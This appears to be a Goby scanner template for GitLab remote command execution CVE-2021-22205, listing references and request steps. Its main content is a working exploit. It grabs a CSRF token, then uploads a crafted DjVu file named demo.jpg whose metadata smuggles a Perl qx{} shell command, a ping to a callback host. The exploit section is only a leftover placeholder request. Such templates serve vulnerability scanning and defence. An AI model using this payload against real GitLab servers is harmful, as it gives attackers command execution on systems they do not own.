{ "Name": "GitLab RCE CVE-2021-22205", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "app=\"gitlab\" || title=\"gitlab\"", "Description": "GitLab is The DevOps Platform.", "Product": "GitLab", "Homepage": "https://about.gitlab.com/", "Author": "", "Impact": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.", "Recommendation": "", "References": [ "https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator", "https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196", "https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json", "https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/", "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/", "https://hackerone.com/reports/1154542", "https://nvd.nist.gov/vuln/detail/CVE-2021-22205" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/users/sign_in", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "experimentation_subject_id", "bz": "" } ] }, "SetVariable": [ "X-CSRF-Token|lastbody|regex|name=\\\"csrf-token\\\" content=\\\"([\\s\\S]+?)\\\" />", "output|lastbody|text|" ] }, { "Request": { "method": "POST", "uri": "/uploads/user", "follow_redirect": false, "header": { "X-CSRF-Token": "{{{X-CSRF-Token}}}", "Content-Type": "multipart/form-data; boundary=---------------------------99652559321225150602861519786", "X-Requested-With": "XMLHttpRequest" }, "data_type": "text", "data": "-----------------------------99652559321225150602861519786\r\nContent-Disposition: form-data; name=\"file\"; filename=\"demo.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\u0000\u0000\u0000tDJVUINFO\u0000\u0000\u0000\r\n\u0000\u0000\u0000\u0000\u0018\u0000,\u0001\u0016\u0001BGjp\u0000\u0000\u0000\u0000ANTa\u0000\u0000\u0000N(metadata\r\n\t(Copyright \"\\\r\n\" . qx{ping -c1 {{{check}}} } . \\\r\n\" b \") )\r\n\r\n-----------------------------99652559321225150602861519786--\r\n", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "422", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Failed to process image", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }